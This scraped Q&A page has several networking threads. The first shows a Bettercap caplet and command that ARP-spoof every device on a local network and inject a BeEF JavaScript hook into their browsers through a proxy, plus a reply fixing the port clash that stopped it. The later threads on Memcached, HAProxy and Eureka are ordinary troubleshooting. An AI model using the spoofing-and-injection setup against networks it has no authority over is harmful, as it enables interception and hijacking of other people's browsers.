Bettercap: bind: address already in use

Whatever port I try to use I keep getting the error:
listen tcp 0.0.0.0:PORT_NUMBER: bind: address already in use
Environment
Bettercap 2.11.1 (installed via Homebrew)
macOS High Sierra
golang 1.11.4
Command line code used:
sudo bettercap -eval "set net.probe off; set arp.spoof.targets 0.0.0.0" -caplet beef-active.cap
beef-active.cap:
set http.proxy.script beef-inject.js
set http.proxy.port 8011
set https.proxy.port 8011
http.proxy on
https.proxy on
sleep 1
arp.spoof on
Expected behavior:
I am trying to inject some JS into the browser of each computer connected to my router. I expect to see a message that beef-inject.js was injected successfully.
Actual behavior:
Stops when it hits my IP address. Here is the output:
[13:26:41] [sys.log] [inf] http.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS key from /var/root/.bettercap-ca.key.pem
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS certificate from /var/root/.bettercap-ca.cert.pem
[13:26:41] [sys.log] [inf] Enabling forwarding.
[13:26:41] [sys.log] [inf] https.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [!!!] listen tcp 0.0.0.0:8011: bind: address already in use
Edit:
I changed the two ports so they are different and the error went away, but it is still not injecting any JS into the browsers. All I see in the console are new/lost endpoint messages like this:
0.0.0.0/24 > 0.0.0.0 » [08:33:17] [endpoint.new] endpoint 0.0.0.0 detected as 04:18:d6:d0:69:e7 (Apple, Inc.).
0.0.0.0/24 > 0.0.0.0 » [08:33:23] [endpoint.lost] endpoint 0.0.0.0 (Apple, Inc.) lost.
.... Then it keeps ticking through the same messages, new > lost > new > lost
Any ideas?

set http.proxy.port 8011
set https.proxy.port 8011
Those ports are set to the same thing, which means they're both trying to listen on 8011 and are stomping on each other.
Change one of them to a different port and the error should go away.
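For example (a sketch; 8012 is just an arbitrary free port, the rest of the caplet stays as it is):
set http.proxy.port 8011
set https.proxy.port 8012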
Cheers!

Related

You should use a persistent object cache. Why does Memcached on WordPress not work on a LAMP stack with multiple virtual hosts?

I have a LAMP stack with multiple virtual hosts. Memcached is not working in WordPress; it used to, until I created more virtual hosts.
From WordPress I get:
You should use a persistent object cache
From W3 Total Cache, I get the following:
The following memcached servers are not responding or not running:
Database Cache: 127.0.0.1:11211.
Object Cache: 127.0.0.1:11211.
This message will automatically disappear once the issue is resolved.
My info.php here
lsof -i :11211
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
memcached 350432 memcache 22u IPv4 5140918 0t0 TCP localhost:11211 (LISTEN)
memcached 350432 memcache 23u IPv6 5140919 0t0 TCP ip6-localhost:11211 (LISTEN)
In /etc/memcached.conf I have set -l 127.0.0.1 and also -l ::1 for IPv6.
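For reference, that corresponds to lines roughly like these in /etc/memcached.conf (a sketch; the rest of the file is unchanged):
-l 127.0.0.1
-l ::1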
With -vv verbose logging enabled, memcached logs:
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: authenticated() in cmd 0x01 is false
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: >24 Writing an error: Auth failure.
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: >24 Writing bin
/var/log/apache2/error.log:
PHP message: [ERROR] WP_CACHE constant is not present in wp-config.php
PHP Warning: Trying to access array offset on value of type null in /var/www/html/example.com/public_html/wp-content/plugins/w3-total-cache/Util_Installed.php on line 145', referer: https://www.example.com/wp-admin/plugins.php?plugin_status=all&paged=1&s
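For reference, the WP_CACHE message refers to the line W3 Total Cache normally expects near the top of wp-config.php, something like:
define('WP_CACHE', true);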
EDIT:
I can see that Redis still shows as enabled even though I have removed it completely, which is weird.
Any help on how to resolve this would be really great, thanks!
I have tried everything I can think of: enabling as much logging as possible and searching the web. I expect to get Memcached working again :)

Haproxy 1.6.2 not recognizing resolvers section

As a test, I have a local bind instance running:
>netstat -ant | grep LISTEN
tcp 0 0 10.72.186.23:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
...
>nslookup mysubdomain.example.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: mysubdomain.example.com
Address: nn.nn.nn.251
Name: mysubdomain.example.com
Address: nn.nn.nn.249
Name: mysubdomain.example.com
Address: nn.nn.nn.201
Name: mysubdomain.example.com
Address: nn.nn.nn.138
I'm running haproxy 1.6.2 on the same host, with a resolvers section:
resolvers dns
nameserver dns1 127.0.0.1:53
nameserver dns2 10.72.186.23:53
hold valid 10s
It doesn't reject the resolvers section, but it doesn't seem to be using it either. It doesn't show up in the stats page, and attempting to add this server line:
server mysubdomain-dev mysubdomain.example.com
causes this error:
>service haproxy restart
* Restarting haproxy haproxy
[ALERT] 322/171813 (10166) : parsing [/etc/haproxy/haproxy.cfg:77] : 'server mysubdomain-dev' : invalid address: 'mysubdomain.example.com' in 'mysubdomain.example.com'
[ALERT] 322/165300 (29751) : Error(s) found in configuration file : /etc/haproxy/haproxy.cfg
[ALERT] 322/165300 (29751) : Fatal errors found in configuration.
The haproxy doc https://cbonte.github.io/haproxy-dconv/configuration-1.6.html indicates this should work.
server <name> <address>[:[port]] [param*]
...
<address> is the IPv4 or IPv6 address of the server. Alternatively, a
resolvable hostname is supported, but this name will be resolved
during start-up. Address "0.0.0.0" or "*" has a special meaning.
Is there some other piece that needs to be added to the haproxy.cfg that activates the resolvers section?
When HAProxy first starts, it attempts to resolve the hostnames of any servers in all the backends to fill the server structures. During this first startup phase, HAProxy uses the OS resolver, i.e. generally the servers defined in your /etc/resolv.conf file.
Only later, when the servers' IP addresses are updated during health checks, does HAProxy use its resolvers section and internal DNS resolver.
From your error description, it seems your host itself cannot resolve the mysubdomain.example.com hostname. HAProxy will only be able to start if it can resolve the hostname without an explicitly named nameserver. This can be verified with e.g.
dig mysubdomain.example.com
It might also be that you are not specifying the resolvers to use for that server:
server mysubdomain-dev mysubdomain.example.com ->
server mysubdomain-dev mysubdomain.example.com resolvers dns
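For example, a minimal sketch (be_mysubdomain and the port are placeholders; it is the health check that triggers the runtime re-resolution through the resolvers section):
backend be_mysubdomain
server mysubdomain-dev mysubdomain.example.com:80 check resolvers dns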

haproxy configuration error

service haproxy start
* Starting haproxy haproxy
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:80: cannot bind socket
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:443: cannot bind socket
The issue is that there is no listen port in the configuration. Use "listen" or "bind" with a port and then restart it; it should work. If you're still having trouble, post the configuration here and I will look into it.
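For example, a minimal sketch (the frontend address is taken from your error output; the backend server is a placeholder):
listen www
bind 50.112.164.38:80
server web1 10.0.0.10:80 check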
Safi

haproxy sni ssl_fc_has_sni always 0

I am trying to create an SNI based frontend/backend setup in HAProxy. It seems that ssl_fc_has_sni is always evaluating to 0 in my log and I haven't been able to figure out why.
This is a simplified version of the config I've been testing with:
global
user haproxy
group haproxy
daemon
log /dev/log local0
defaults
timeout connect 5s
timeout client 30s
timeout server 30s
timeout tunnel 1h
log-format frontend:%f\ %b/%s\ client_ip:%Ci\ client_port:%Cp\ SSL_version:%sslv\ SSL_cypher:%sslc\ SNI:%[ssl_fc_has_sni]\ %ts
frontend public_ssl
bind :443
log global
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend be_sni if { ssl_fc_has_sni }
default_backend be_no_sni
backend be_sni
server fe_sni 127.0.0.1:10444 weight 1 send-proxy
frontend fe_sni
#terminate with a cert that matches the sni host
bind 127.0.0.1:10444 ssl crt /mycertdir/certs accept-proxy no-sslv3
default_backend be_default
frontend fe_no_sni
#terminate with a generic cert
bind 127.0.0.1:10443 ssl crt /myothercertdir/default_pub_keys.pem accept-proxy no-sslv3
default_backend be_default
# backend for when sni does not exist, or ssl term needs to happen on the edge
backend be_no_sni
server fe_no_sni 127.0.0.1:10443 weight 1 send-proxy
backend be_default
mode http
option forwardfor
option http-pretend-keepalive
server the_backend 127.0.0.1:8080
Other items of note:
haproxy -vv shows OpenSSL library supports SNI : yes
I am running haproxy version 1.5.9 on fedora 20 through vagrant
the log always shows SNI:0 haproxy[17807]: frontend:public_ssl be_no_sni/fe_no_sni client_ip:<ip> client_port:42285 SSL_version:- SSL_cypher:- SNI:0 --
I'm testing with openssl s_client -servername www.example.com -connect <ip>:443.
I feel like I'm missing something obvious since there is no ssl version, cypher, or sni.
It looks like ssl_fc_has_sni is meant to be used after SSL termination. Checking for the presence of an SNI host in the TCP frontend can be accomplished with:
frontend public_ssl
bind :443
mode tcp
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend be_sni if { req.ssl_sni -m found }
default_backend be_no_sni
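If you later need to route on a specific SNI value rather than just its presence, the same pre-termination fetch can be matched against a hostname (the backend name here is hypothetical):
use_backend be_example if { req.ssl_sni -i www.example.com }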

Error when getting the Info from Config Server

I am configuring a Eureka client app, but the registered port always ends up as 80.
The server config is obtained via Eureka with auto-discovery enabled; when auto-discovery is disabled, the port is registered correctly.
The app's port is assigned only from the command line (--server.port=8080) and removed from all other property files (app.yaml, bootstrap.yaml, and the config server git repo).
I have noticed that in this code:
EurekaClientConfiguration.java
if (port != 0 && instanceConfig.getNonSecurePort() == 0) {
instanceConfig.setNonSecurePort(port);
}
instanceConfig.getNonSecurePort() is never 0, so the nonSecurePort property is never changed.
Do I have to register the port property somewhere else?
Edited to add some detail:
I mean that my bootstrap.yml has the following lines:
cloud:
  config:
    discovery:
      enabled: true
The YAML config is in a GitHub repository and does not have the port assigned.
The app is running on port 8082 (started with --server.port=8082), but when it is registered in Eureka the port is always 80 instead of 8082:
<port enabled="true">8082</port>
<securePort enabled="false">443</securePort>
This causes every Ribbon-based invocation to get the wrong URL.
I noticed that the port is set correctly in this event handler, which runs after init:
EurekaClientConfiguration.java:
public void onApplicationEvent(EmbeddedServletContainerInitializedEvent event) {
...
EurekaClientConfiguration.this.port = event.getEmbeddedServletContainer().getPort();
But by that point the "running" flag is already set, so it doesn't have any effect.
Thanks a lot for your help